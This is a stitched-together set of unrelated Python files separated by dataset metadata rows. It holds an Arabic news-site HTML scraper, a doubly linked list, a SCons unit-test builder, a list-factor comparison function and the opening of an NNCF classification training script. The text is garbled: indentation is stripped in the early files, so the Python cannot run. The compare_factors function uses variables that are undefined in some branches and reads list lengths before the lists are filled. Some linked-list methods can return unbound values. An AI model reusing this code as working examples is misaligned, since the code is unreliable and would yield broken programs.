body_ = page_.xpath("//div[@id='PressRContent']/p/descendant::text()")
body_.extend(page_.xpath("//div[@id='PressRContent']/child::text()")) # Added recently
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
# Add text from all div elements except those with attribute named 'PressRDateAdded' or 'fonts',
# which correspond to the date and author, respectively.
body_ = page_.xpath("//div[@id='PressRContent']/div")
for node in body_:
ignore = False
for attribute in node.xpath("@*"):
if 'PressRDateAdded' in attribute or 'fonts' in attribute:
ignore = True
break
if ignore: continue
data_.extend([t.encode('utf-8').strip() for t in node.xpath("descendant-or-self::text()") if t])
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_masrawy(self, html_):
page_ = lxml.html.fromstring(html_)
title_ = page_.xpath("//div[@id='mclip']/div[@id='artical']/h1/descendant::text()")
data_ = []
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@id='mclip']/div[@id='artical']/div[@id='content']/child::text()") #Added recently
body_.extend(page_.xpath("//div[@id='mclip']/div[@id='artical']/div[@id='content']/p/descendant::text()"))
for b in body_:
b = b.encode('utf-8').strip()
#print b
# Break if the text "2kra2 2ydan:"
if u'\u0627\u0642\u0631\u0623 \u0623\u064A\u0636\u0627:'.encode('utf-8') in b: break
if b: data_.append(b)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_ahram(self, html_): # AHRAM update this site, this is not used anymore, only for old data.
page_ = lxml.html.fromstring(html_)
exp = "//div[@id='ArticlePrintVersion']/div[@class='bbbody']/"
title_ = page_.xpath(exp + "div[@id='headDiv']/div[@id='divtitle']/span[@id='txtTitle']/descendant::text()")
data_ = []
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath(exp + "div[@id='abstractDiv']/descendant::text()")
body_.extend(page_.xpath(exp + "descendant-or-self::node()/div[@id='bodyDiv']/descendant::text()"))
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_ahram_NEW_SITE(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@id='ctl00_ContentPlaceHolder1_divTitle']/descendant::text()")
title_.extend(page_.xpath("//div[@id='ctl00_ContentPlaceHolder1_hd']/descendant::text()"))
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@id='ctl00_ContentPlaceHolder1_divContent']/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b and not u'رابط دائم'.encode('utf-8') in b: data_.append(b)
return '\n'.join(data_)
def __parse_bbcarabic(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
exp = "//div[@class=' g-w20 g-first']/div[@class='g-container']/h1/descendant-or-self::text()"
for t in page_.xpath(exp):
t = t.encode('utf-8').strip()
if t: data_.append(t)
exp = "//div[@class=' g-w20 g-first']/div[@class='g-container story-body']/div[@class='bodytext']/p/descendant::text() | "
exp += "//div[@class=' g-w20 g-first']/div[@class='g-container']/div[@class='bodytext']/p/descendant::text()"
for t in page_.xpath(exp):
t = t.encode('utf-8').strip()
if t: data_.append(t)
#for node in page_.xpath(exp):
#if node.xpath("attribute::class") == "module inline-contextual-links":
# continue
# text_ = node.xpath("descendant-or-self::text()")
# for t in text_:
# t = t.encode('utf-8').strip()
# if t: data_.append(t)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_dostorasly(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
exp = "//div[@class='contentMain']/div[@class='rightArea']/"
title_ = page_.xpath(exp + "div[@class='sectionTitle']/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath(exp + "div[@class='authorArticleContent']/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_elwatannews(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
exp = "//div[@class='main_content_ip']/h1[@class='article_title']/descendant-or-self::text()"
title_ = page_.xpath(exp)
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
exp = "//div[@class='main_content_ip']/span[@class='SubTitle']/descendant::text()"
exp += " | //div[@class='main_content_ip']/p/descendant::text()"
body_ = page_.xpath(exp)
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_english_fjp(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
exp = "//div[@id='leftcontent']/table"
title_ = page_.xpath(exp + "/tr[3]/td/div/child::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath(exp + "/tr[7]/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_youm7(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
exp = "//div[@id='newsStory']/div[@id='newsStoryHeader']/"
title_ = page_.xpath(exp + 'h1/descendant::text() | ' + exp + 'h2/descendant::text() | ' + exp + 'h3/descendant::text()')
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
exp = "//div[@id='newsStory']/div[@id='newsStoryContent']/div[@id='newsStoryTxt']/p/descendant::text()" #changed child to descendant
body_ = page_.xpath(exp)
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_tahrir(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@class='eventTitle']/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@class='eventInner']/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
return '\n'.join(data_)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
def __parse_akhbar_masr(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@class='content-header tr']/h2/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@class='main-section user-content']/p/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
return '\n'.join(data_)
def __parse_rasd(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@class='page_news_right']/h1/descendant::text()")
title_.extend(page_.xpath("//div[@class='page_news_right']/h3/descendant::text()"))
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@class='page_news_right']/div[@class='news_artical']/p/descendant::text()")
body_.extend(page_.xpath("//div[@class='page_news_right']/div[@class='news_artical']/div/descendant::text()"))
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
return '\n'.join(data_)
def __parse_almasryoon(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@id='news_shows']/div[@id='data_content_show2']/div[@id='head_topic']/div[@id='3nwan_cell']/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@id='news_shows']/p/descendant::text()")
body_.extend(page_.xpath("//div[@id='news_shows']/div[@style='direction: rtl;']/descendant::text()"))
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
return '\n'.join(data_)
def __parse_alwafd(self, html_): # don't decode html from this website
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@class='article_title']/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@class='inside impress maincom']/p/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
return '\n'.join(data_)
def __parse_akhbar_elyom(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@id='ctl00_ContentPlaceHolder1_newsPlaceHolder']/table/tbody/tr[1]/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@id='ctl00_ContentPlaceHolder1_newsPlaceHolder']/table/tbody/tr/td[@class='articleBody']/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
###################################################NEW FORMAT#####################################
title_ = page_.xpath("//h4[@class='topicTitle']/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//p[@class='postTopicP']/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
return '\n'.join(data_)
def __parse_elbadil(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@id='content-region-inner']/h1/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@class='field field-name-body field-type-text-with-summary field-label-hidden']/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
return '\n'.join(data_)
def __parse_dostor(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//table[@class='contentpaneopen']/descendant::*/td[@class='contentheading']/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//table[@class='contentpanebody']/descendant::*/div[@class='article_text']/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b and not 'pdf' in b and not u'تصفح جريدة الدستور اليوم'.encode('utf-8') in b: data_.append(b)
return '\n'.join(data_)
def __parse(self, news_site_, html_):
if news_site_ == CONST.AKHBAR:
return self.__parse_akhbarelyomgate(html_)
elif news_site_ == CONST.SHOROUK:
return self.__parse_shorouk(html_)
elif news_site_ == CONST.CNN_ARABIC:
return self.__parse_cnn_arabic(html_)
elif news_site_ == CONST.ALMASRY_ELYOM:
return self.__parse_almasryalyoum(html_)
elif news_site_ == CONST.FAGR:
return self.__parse_elfagr(html_)
elif news_site_ == CONST.ENGLISH_AHRAM:
return self.__parse_english_ahram(html_)
elif news_site_ == CONST.FJP:
return self.__parse_fjp(html_)
elif news_site_ == CONST.MASRAWY:
return self.__parse_masrawy(html_)
elif news_site_ == CONST.AHRAM:
return self.__parse_ahram_NEW_SITE(html_)
elif news_site_ == CONST.BBC_ARABIC:
return self.__parse_bbcarabic(html_)
elif news_site_ == CONST.DOSTOR_ASLY:
return self.__parse_dostorasly(html_)
elif news_site_ == CONST.WATAN:
return self.__parse_elwatannews(html_)
elif news_site_ == CONST.ENGLISH_FJP:
return self.__parse_english_fjp(html_)
elif news_site_ == CONST.YOUM7:
return self.__parse_youm7(html_)
elif news_site_ == CONST.TAHRIR:
return self.__parse_tahrir(html_)
elif news_site_ == CONST.AKHBAR_MASR:
return self.__parse_akhbar_masr(html_)
elif news_site_ == CONST.RASD:
return self.__parse_rasd(html_)
elif news_site_ == CONST.MASRYOON:
return self.__parse_almasryoon(html_)
elif news_site_ == CONST.WAFD:
return self.__parse_alwafd(html_)
elif news_site_ == CONST.AKHBAR_ELYOM:
return self.__parse_akhbar_elyom(html_)
elif news_site_ == CONST.BADIL:
return self.__parse_elbadil(html_)
elif news_site_ == CONST.DOSTOR:
return self.__parse_dostor(html_)
else:
print "Wrong News Site Name"
def __parse_news_site(self, news_site_, json_index_):
for path, v in json_index_.items():
if v.has_key('parsed') and v['parsed'] == True: continue
if news_site_ == CONST.YOUM7:
text_ = self.__parse(news_site_, helper.READ_FILE(path).decode('windows-1256'))
else:
text_ = self.__parse(news_site_, helper.READ_FILE(path).decode('utf-8'))
text_dir_ = os.path.dirname(path).replace('html', 'txt')
if not os.path.exists(text_dir_): os.makedirs(text_dir_)
file_ = "{0}.txt".format(os.path.basename(path)[:-5])
text_file_ = os.path.join(text_dir_, file_)
self._logger.log_info(text_file_)
helper.WRITE_FILE(text_file_, text_)
json_index_[path]['parsed'] = True
helper.UPDATE_JSON_FILE(self._index_path, path, json_index_[path])
# TODO: DELETE json_index_, will not use it anymore. DONE
def __parse_news_site_db(self, news_site_):
for index in self._db.select_unparsed_by_label(self._rss_label):
path = index.file_path
#assert path in json_index_.keys()
#assert not json_index_[path].has_key('parsed') or not json_index_[path]['parsed']
if news_site_ == CONST.YOUM7:
text_ = self.__parse(news_site_, helper.READ_FILE(path).decode('windows-1256'))
else:
text_ = self.__parse(news_site_, helper.READ_FILE(path).decode('utf-8'))
text_dir_ = os.path.dirname(path).replace('html', 'txt')
if not os.path.exists(text_dir_): os.makedirs(text_dir_)
file_ = "{0}.txt".format(os.path.basename(path)[:-5])
text_file_ = os.path.join(text_dir_, file_)
self._logger.log_info(text_file_)
helper.WRITE_FILE(text_file_, text_)
#json_index_[path]['parsed'] = True
self._db.set_parsed(path)
#helper.UPDATE_JSON_FILE(self._index_path, path, json_index_[path])
def __parse_news_from_mce(self, news_site_):
for record in self._db.get_unparsed_html(news_site_):
if news_site_ == CONST.WAFD:
text_ = self.__parse(news_site_, helper.READ_FILE(record.news_html_filepath))
elif news_site_ == CONST.YOUM7 or news_site_ == CONST.FAGR:
text_ = self.__parse(news_site_, helper.READ_FILE(record.news_html_filepath).decode('windows-1256'))
else:
text_ = self.__parse(news_site_, helper.READ_FILE(record.news_html_filepath).decode('utf-8'))
text_dir_ = os.path.dirname(record.news_html_filepath).replace('html', 'txt')
with threading.Lock():
if not os.path.exists(text_dir_): os.makedirs(text_dir_)
file_ = "{0}.txt".format(os.path.basename(record.news_html_filepath)[:-5])
text_file_ = os.path.join(text_dir_, file_)
self._logger.log_info(text_file_)
helper.WRITE_FILE(text_file_, text_)
self._db.set_news_html_parsed(record.id)
def parse_news_site(self):
self._logger.log_info(self._rss_label)
try:
news_site_ = self._rss_label
if '-' in news_site_: news_site_ = news_site_.split('-')[0]
if self._is_mce_news:
self.__parse_news_from_mce(news_site_)
else:
self.__parse_news_site_db(news_site_)
except:
self._logger.log_error(self._rss_label, traceback.format_exc())
def __init__(self, rss_label_, is_mce_news = False):
self._logger = helper.Logger(CONST.HTML_PARSER_LOG_DIR)
self._rss_label = rss_label_
self._index_path = os.path.join(CONST.RSS_HTML_INDEX_DIR, "{0}.json".format(self._rss_label))
self._db = db.IndexOperation() if not is_mce_news else db.MceWatchIndexOperation()
self._is_mce_news = is_mce_news
#if not os.path.exists(self._index_path):
# raise ValueError("Index: '{0}' doesn't exist.".format(self._index_path))
def PARSE(rss_labels_, is_mce_news = False):
parsers_ = []
for label in rss_labels_:
try:
parsers_.append(HTMLParser(label, is_mce_news))
except:
print traceback.format_exc()
if not parsers_:
print "Nothing to do."
return
#RUN_PARSER(parsers_[0])
pool = Pool(processes=16)
pool.map(RUN_PARSER, parsers_)
pool.close()
pool.join()
print "Done"
def RUN_PARSER(parser_):
parser_.parse_news_site()
if __name__ == '__main__':
PARSE(CONST.RSS_LABELS)
def correct_index_format(rss_label_):
try:
index_path_ = os.path.join(CONST.RSS_HTML_INDEX_DIR, "{0}.json".format(rss_label_))
index_ = helper.READ_JSON_FILE(index_path_)
for k, v in index_.items():
if type(v) == dict:
continue
index_[k] = {'url':v[0], 'data':v[1]}
index_path_ = index_path_.replace('index', 'new_index')
helper.WRITE_JSON_FILE(index_path_, index_)
except:
print rss_label_, '\n\n', traceback.format_exc()
def correct_index(rss_label_):
try:
index_path_ = os.path.join(CONST.RSS_HTML_INDEX_DIR, "{0}.json".format(rss_label_))
index_ = helper.READ_JSON_FILE(index_path_)
for k, v in index_.items():
v['date'] = v['data']
del v['data']
index_[k] = v
index_path_ = index_path_.replace('index', 'new_index')
helper.WRITE_JSON_FILE(index_path_, index_)
except:
print rss_label_, '\n', traceback.format_exc()
| UTF-8 | Python | false | false | 27,039 | py | 155,526 | html_parser.py | 19 | 0.535839 | 0.527212 | 0 | 634 | 41.602524 | 176 |
omkar6644/Python-Training | 14,886,356,656,142 | b7b4f9f8aa35d2dc887efa3948f09a1cbfb7bb76 | cd91d4c2cef458ef0d82f4daed3fad0247e2d3c5 | /Doubly_Linked_List.py | 9dec6399b1d07a41abc290b8ff0e9f1bb08a06ca | []
| no_license | https://github.com/omkar6644/Python-Training | bde04eeffd0853d01d966eeeec8cc44300edda78 | f8212dccf2dddd6acc6cff4164d2d27324bf9564 | refs/heads/main | 2023-05-28T10:58:41.427295 | 2021-06-11T12:01:39 | 2021-06-11T12:01:39 | 364,865,236 | 0 | 0 | null | false | 2021-05-11T11:53:27 | 2021-05-06T10:03:23 | 2021-05-11T11:52:14 | 2021-05-11T11:53:26 | 12 | 0 | 0 | 1 | Python | false | false | class Node:
#Node class constructor to initialize data, next, prev
def __init__(self, value):
self.value = value
self.next = None
self.prev = None
class DoublyLinkedList:
#Linkedlist class constructor to initialize head
def __init__(self):
self.head = None
#adding elements to the list
def add(self, data):
new_node = Node(data)
new_node.next = self.head
if self.head is not None:
self.head.prev = new_node
self.head = new_node
#adding element at beginning of list
def addAtBegin(self, data):
new_node = Node(data)
new_node.next = self.head
self.head.prev = new_node
self.head = new_node
#deleting node from list
def deleteNode(self, x):
if self.head is None:
return
if self.head == x:
self.head = x.next
if x.next is not None:
x.next.prev=x.prev
if x.prev is not None:
x.prev.next=x.next
#adding element at end of list
def addAtEnd(self, data):
new_node = Node(data)
if self.head is None:
self.head = new_node
else:
n = self.head
while n.next is not None:
n = n.next
n.next = new_node
new_node.prev = n
#getting node after specified value
def getNodeAfterValue(self,data):
val = self.head
while val:
if val.value==data:
val = val.next
res1=val.value
break
val = val.next
return res1
#getting node before specified value
def getNodeBefore(self,data):
n=self.head
while n is not None:
if n.value==data:
res=n.prev
res1=res.value
n=n.next
return res1
#reversing the list
def reverseLinkedlist(self):
prev = None
while self.head:
next = self.head.next
self.head.next = prev
prev = self.head
self.head = next
self.head = prev
#counting the number of elements in the list
def count(self):
temp=self.head
count=0
while temp is not None:
count=count+1
temp=temp.next
return count
#printing elements of the list
def printList(self):
if self.head is None:
return
else:
n=self.head
while n is not None:
print(n.value)
n=n.next
d = DoublyLinkedList()
d.add(10)
d.add(20)
print("adding at beginning")
d.addAtBegin(1)
d.addAtBegin(2)
d.addAtBegin(3)
d.printList()
print()
print("after deleting")
d.deleteNode(d.head.next)
d.printList()
print()
print()
print("adding at end")
d.addAtEnd(1000)
d.printList()
print()
print()
print(d.getNodeAfterValue(1))
print()
print()
print(d.getNodeBefore(1))
print()
d.reverseLinkedlist()
d.printList()
print()
print()
print("No of elements in list is: ",d.count())
| UTF-8 | Python | false | false | 3,246 | py | 49 | Doubly_Linked_List.py | 40 | 0.520025 | 0.514171 | 0 | 130 | 22.969231 | 58 |
Mokona/La-Grille | 8,074,538,565,302 | 53fb81a0503e849c9bc543c48e1bb45ebbb70016 | 81ea71bd0cd9eba88abccfa1b112d7bd7dba661e | /build/site_scons/UnitTestBuilder.py | 872fd43be2528c7bacf43d619726e075d7b398fb | []
| no_license | https://github.com/Mokona/La-Grille | 83751b5a25a21d3dc71b02f9a36e3038f159ab15 | 6a1d1d15601e04eed8b62fce287e16be16dd5157 | refs/heads/master | 2016-08-03T12:42:11.787930 | 2010-02-12T22:25:09 | 2010-02-12T22:25:09 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Unit testing builder
import os
import os.path
def builder_unit_test(target, source, env):
app = str(source[0].abspath)
if os.spawnl(os.P_WAIT, app, app)==0:
open(str(target[0]),'w').write("PASSED\n")
else:
return 1
| UTF-8 | Python | false | false | 258 | py | 126 | UnitTestBuilder.py | 119 | 0.593023 | 0.577519 | 0 | 10 | 23.6 | 50 |
1068171/CSE-Novello-Final | 3,917,010,187,549 | b6e09fafd327a140387683fccf1e0fb8d9bf4a52 | 8d5523b0b049246475e8bca1af4cd043c612a18c | /Compare_Factors_Final.py | 1ac38b86e19b217590001038780cd9c901f522ad | []
| no_license | https://github.com/1068171/CSE-Novello-Final | 08c3ee43d4015204a7a4e93b692d2fcb47ef2a7d | 7c8c568ec9aefacaeb712aee64fb60102d528fc5 | refs/heads/master | 2016-09-14T18:53:15.432698 | 2016-05-25T00:06:21 | 2016-05-25T00:06:21 | 59,050,028 | 0 | 10 | null | false | 2016-05-24T16:42:05 | 2016-05-17T18:52:15 | 2016-05-19T20:13:45 | 2016-05-24T16:42:05 | 29 | 0 | 9 | 1 | Python | null | null | def compare_factors(list1, list2):
length_1 = len(list1)
length_2 = len(list2)
list_1_factors = []
list_2_factors = []
factors_length_1 = len(list_1_factors)
factors_length_2 = len(list_2_factors)
longer_factors_list = list_1_factors
shorter_factors_list = list_2_factors
overlap = [] # A map of where the first number of the pair matches between the two lists
final_value = 0 # Number of common numbers
if factors_length_1 > factors_length_2: # Finds list with more factors
longer_factors_list = list_1_factors
shorter_factors_list = list_2_factors
elif factors_length_2 > factors_length_1:
longer_factors_list = list_2_factors
shorter_factors_list = list_1_factors
else:
longer_list = list_1_factors
shorter_list = list_2_factors
for x in range(length_1): # Puts the first number in list1 in a list
list_1_factors.append(list1[x][0])
x += 1
for x in range(length_2): # Puts the first number in list2 in a list
list_2_factors.append(list2[x][0])
x += 1
for x in range(len(shorter_factors_list)): # If the first number in each tuple is the same in both lists, write true
flag = False # Evaluate false after loop
for y in range(len(longer_factors_list)):
if shorter_list[x] == longer_list[y]: # Compares numbers
overlap.append(y)
flag = True
if flag == False:
overlap.append("no") # Can't use 'False' or '0' because they are used interchangeably in python
for index in range(len(overlap)): # Finds how many times there is a common number between the lists
if overlap[index] != "no":
if list1[index][1] < list2[overlap[index]][1]: # Looks at where overlap points in the second list
final_value += list1[index][1]
else:
final_value += list2[overlap[index]][1]
total_nums = 0
for pair in list1: # Finds the total number of numbers
total_nums += pair[1]
for pair in list2:
total_nums += pair[1]
output = float(final_value)/float(total_nums) # Divides the number of common numbers by the total number of numbers
output = round(output, 2)
return output | UTF-8 | Python | false | false | 2,302 | py | 5 | Compare_Factors_Final.py | 4 | 0.620765 | 0.598175 | 0 | 61 | 36.754098 | 121 |
openvinotoolkit/nncf | 455,266,542,980 | b228e6de6f116ff601e35b2f332a21a20ba1765e | 62179a165ec620ba967dbc20016e890978fbff50 | /examples/torch/classification/main.py | 2854c894f0a8a93f854d8900b264aa0339c1ade8 | [
"Apache-2.0"
]
| permissive | https://github.com/openvinotoolkit/nncf | 91fcf153a96f85da166aacb7a70ca4941e4ba4a4 | c027c8b43c4865d46b8de01d8350dd338ec5a874 | refs/heads/develop | 2023-08-24T11:25:05.704499 | 2023-08-23T14:44:05 | 2023-08-23T14:44:05 | 263,687,600 | 558 | 157 | Apache-2.0 | false | 2023-09-14T17:06:41 | 2020-05-13T16:41:05 | 2023-09-14T12:38:03 | 2023-09-14T17:06:41 | 39,847 | 659 | 176 | 65 | Python | false | false | # Copyright (c) 2023 Intel Corporation
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path as osp
import sys
import time
import warnings
from copy import deepcopy
from functools import partial
from pathlib import Path
from shutil import copyfile
from typing import Any
import torch
import torch.nn.parallel
import torch.optim
import torch.utils.data
import torch.utils.data.distributed
from torch import nn
from torch.backends import cudnn
from torch.cuda.amp.autocast_mode import autocast
from torch.nn.modules.loss import _Loss
from torch.optim.lr_scheduler import ReduceLROnPlateau
from torchvision import datasets
from torchvision import models
from torchvision import transforms
from torchvision.datasets import CIFAR10
from torchvision.datasets import CIFAR100
from torchvision.models import InceptionOutputs
from examples.common.paths import configure_paths
from examples.common.sample_config import SampleConfig
from examples.common.sample_config import create_sample_config
from examples.torch.common.argparser import get_common_argument_parser
from examples.torch.common.argparser import parse_args
from examples.torch.common.example_logger import logger
from examples.torch.common.execution import ExecutionMode
from examples.torch.common.execution import get_execution_mode
from examples.torch.common.execution import prepare_model_for_execution
from examples.torch.common.execution import set_seed
from examples.torch.common.execution import start_worker
from examples.torch.common.export import export_model
from examples.torch.common.model_loader import COMPRESSION_STATE_ATTR
from examples.torch.common.model_loader import MODEL_STATE_ATTR
from examples.torch.common.model_loader import extract_model_and_compression_states
from examples.torch.common.model_loader import load_model
from examples.torch.common.model_loader import load_resuming_checkpoint
from examples.torch.common.optimizer import get_parameter_groups
from examples.torch.common.optimizer import make_optimizer
from examples.torch.common.utils import MockDataset
from examples.torch.common.utils import NullContextManager
from examples.torch.common.utils import SafeMLFLow
from examples.torch.common.utils import configure_device
from examples.torch.common.utils import configure_logging
from examples.torch.common.utils import create_code_snapshot
from examples.torch.common.utils import get_run_name
from examples.torch.common.utils import is_pretrained_model_requested
from examples.torch.common.utils import is_staged_quantization
from examples.torch.common.utils import log_common_mlflow_params
from examples.torch.common.utils import make_additional_checkpoints
from examples.torch.common.utils import print_args
from examples.torch.common.utils import write_metrics
from nncf.api.compression import CompressionStage
from nncf.common.accuracy_aware_training import create_accuracy_aware_training_loop
from nncf.common.utils.tensorboard import prepare_for_tensorboard
from nncf.config.utils import is_accuracy_aware_training
from nncf.torch import create_compressed_model
from nncf.torch.checkpoint_loading import load_state
from nncf.torch.dynamic_graph.graph_tracer import create_input_infos
from nncf.torch.initialization import default_criterion_fn
from nncf.torch.initialization import register_default_init_args
from nncf.torch.structures import ExecutionParameters
from nncf.torch.utils import is_main_process
from nncf.torch.utils import safe_thread_call
model_names = sorted(
name for name, val in models.__dict__.items() if name.islower() and not name.startswith("__") and callable(val)
)
def get_argument_parser():
parser = get_common_argument_parser()
parser.add_argument("--dataset", help="Dataset to use.", choices=["imagenet", "cifar100", "cifar10"], default=None)
parser.add_argument(
"--test-every-n-epochs", default=1, type=int, help="Enables running validation every given number of epochs"
)
parser.add_argument(
"--mixed-precision",
dest="mixed_precision",
help="Enables torch.cuda.amp autocasting during training and validation steps",
action="store_true",
)
return parser
def main(argv):
parser = get_argument_parser()
args = parse_args(parser, argv)
config = create_sample_config(args, parser)
if config.dist_url == "env://":
config.update_from_env()
configure_paths(config, get_run_name(config))
copyfile(args.config, osp.join(config.log_dir, "config.json"))
source_root = Path(__file__).absolute().parents[2] # nncf root
create_code_snapshot(source_root, osp.join(config.log_dir, "snapshot.tar.gz"))
if config.seed is not None:
warnings.warn(
"You have chosen to seed training. "
"This will turn on the CUDNN deterministic setting, "
"which can slow down your training considerably! "
"You may see unexpected behavior when restarting "
"from checkpoints."
)
config.execution_mode = get_execution_mode(config)
if config.metrics_dump is not None:
write_metrics(0, config.metrics_dump)
if not is_staged_quantization(config):
start_worker(main_worker, config)
else:
from examples.torch.classification.staged_quantization_worker import (
staged_quantization_main_worker, # pylint: disable=cyclic-import
)
start_worker(staged_quantization_main_worker, config)
def inception_criterion_fn(model_outputs: Any, target: Any, criterion: _Loss) -> torch.Tensor:
# From https://discuss.pytorch.org/t/how-to-optimize-inception-model-with-auxiliary-classifiers/7958
output, aux_outputs = model_outputs
loss1 = criterion(output, target)
loss2 = criterion(aux_outputs, target)
return loss1 + 0.4 * loss2
# pylint:disable=too-many-branches,too-many-statements
def main_worker(current_gpu, config: SampleConfig):
configure_device(current_gpu, config)
config.mlflow = SafeMLFLow(config)
if is_main_process():
configure_logging(logger, config)
print_args(config)
else:
config.tb = None
set_seed(config)
# define loss function (criterion)
criterion = nn.CrossEntropyLoss()
criterion = criterion.to(config.device)
model_name = config["model"]
train_criterion_fn = inception_criterion_fn if "inception" in model_name else default_criterion_fn
train_loader = train_sampler = val_loader = None
resuming_checkpoint_path = config.resuming_checkpoint_path
nncf_config = config.nncf_config
pretrained = is_pretrained_model_requested(config)
is_export_only = "export" in config.mode and ("train" not in config.mode and "test" not in config.mode)
if is_export_only:
assert pretrained or (resuming_checkpoint_path is not None)
else:
# Data loading code
train_dataset, val_dataset = create_datasets(config)
train_loader, train_sampler, val_loader, init_loader = create_data_loaders(config, train_dataset, val_dataset)
def train_steps_fn(loader, model, optimizer, compression_ctrl, train_steps):
train_epoch(
loader,
model,
criterion,
train_criterion_fn,
optimizer,
compression_ctrl,
0,
config,
train_iters=train_steps,
log_training_info=False,
)
def validate_model_fn(model, eval_loader):
top1, top5, loss = validate(eval_loader, model, criterion, config, log_validation_info=False)
return top1, top5, loss
def model_eval_fn(model):
top1, _, _ = validate(val_loader, model, criterion, config)
return top1
execution_params = ExecutionParameters(config.cpu_only, config.current_gpu)
nncf_config = register_default_init_args(
nncf_config,
init_loader,
criterion=criterion,
criterion_fn=train_criterion_fn,
train_steps_fn=train_steps_fn,
validate_fn=lambda *x: validate_model_fn(*x)[::2],
autoq_eval_fn=lambda *x: validate_model_fn(*x)[1],
val_loader=val_loader,
model_eval_fn=model_eval_fn,
device=config.device,
execution_parameters=execution_params,
)
# create model
model = load_model(
model_name,
pretrained=pretrained,
num_classes=config.get("num_classes", 1000),
model_params=config.get("model_params"),
weights_path=config.get("weights"),
)
model.to(config.device)
if "train" in config.mode and is_accuracy_aware_training(config):
uncompressed_model_accuracy = model_eval_fn(model)
resuming_checkpoint = None
if resuming_checkpoint_path is not None:
resuming_checkpoint = load_resuming_checkpoint(resuming_checkpoint_path)
